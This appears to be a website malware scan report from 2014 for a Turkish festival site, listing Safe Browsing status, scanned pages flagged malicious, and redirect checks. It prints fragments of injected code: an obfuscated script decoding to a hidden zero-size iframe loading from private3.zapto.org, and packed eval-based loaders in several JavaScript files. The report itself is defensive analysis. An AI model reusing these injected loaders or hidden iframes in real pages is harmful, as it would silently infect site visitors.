Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=festivalarhavi.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://festivalarhavi.org/ | 200 OK Content-Length: 5931 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: private3.zapto.org var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62c ...[1839 bytes skipped]... Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> | ||
http://festivalarhavi.org/js/domover.js | 200 OK Content-Length: 16018 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B N(f){q.2D=B(a,b){p c=\'\';1J(p i=0;i<b.J;i++){c+=G.E(a.W(i%a.J)^b.W(i))}M c};q.Q=B(h){H(h.D(\':\'))h=h.U(\':\')[0];p a=h.U(\'.\');T(a.J>2){a.1n()}M a.1m(\'.\')} Antivirus reports:
| ||
http://festivalarhavi.org/js/jquery.js | 200 OK Content-Length: 12120 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('y N(f){v.2O=y(a,b){q c=\'\';2M(q i=0;i<b.F;i++){c+=I.G(a.17(i%a.F)^b.17(i))}H c};v.S=y(h){J(h.B(\':\'))h=h.W(\':\')[0];q a=h.W(\'.\');X(a.F>2){a.2L()}H a.2K(\'.\' Antivirus reports:
| ||
http://festivalarhavi.org/js/interface.js | 200 OK Content-Length: 15880 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C N(f){v.1w=C(a,b){q c=\'\';1v(q i=0;i<b.I;i++){c+=H.F(a.T(i%a.I)^b.T(i))}J c};v.X=C(h){D(h.y(\':\'))h=h.U(\':\')[0];q a=h.U(\'.\');Z(a.I>2){a.1X()}J a.1r(\'.\')} Antivirus reports:
| ||
http://festivalarhavi.org/anit_Fest/ | 200 OK Content-Length: 15703 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body++};a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,173,173,173,62,164,171,152,171,165,14 Antivirus reports:
| ||
http://festivalarhavi.org/anit_Fest/js/domover.js | 200 OK Content-Length: 4748 Content-Type: application/x-javascript | clean |
http://festivalarhavi.org/anit_Fest/default.asp | 200 OK Content-Length: 15703 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body++};a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,173,173,173,62,164,171,152,171,165,14 Antivirus reports:
| ||
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=3 | 200 OK Content-Length: 6751 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=3&duyurubaslik=Sponsorlar | 200 OK Content-Length: 6751 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=4 | 200 OK Content-Length: 6737 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/basin_odasi.asp?page=default | 200 OK Content-Length: 7721 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=5 | 200 OK Content-Length: 8207 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=2 | 200 OK Content-Length: 7764 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/festival_ekibi.asp?page=default | 200 OK Content-Length: 8778 Content-Type: text/html | clean |
http://festivalarhavi.org/anit_Fest/Sayfalar.asp?id=7 | 200 OK Content-Length: 8360 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: festivalarhavi.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 14 Dec 2014 00:39:08 GMT
Server: Microsoft-IIS/6.0
Content-Length: 5931
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSDBC=AIBHBOGCFJLBHNPEFGDMHABG; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...5931 bytes of data.
GET / HTTP/1.1
Host: festivalarhavi.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 14 Dec 2014 00:39:08 GMT
Server: Microsoft-IIS/6.0
Content-Length: 5931
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSDBC=AIBHBOGCFJLBHNPEFGDMHABG; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...5931 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: festivalarhavi.org
Referer: http://www.google.com/search?q=festivalarhavi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: festivalarhavi.org
Referer: http://www.google.com/search?q=festivalarhavi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.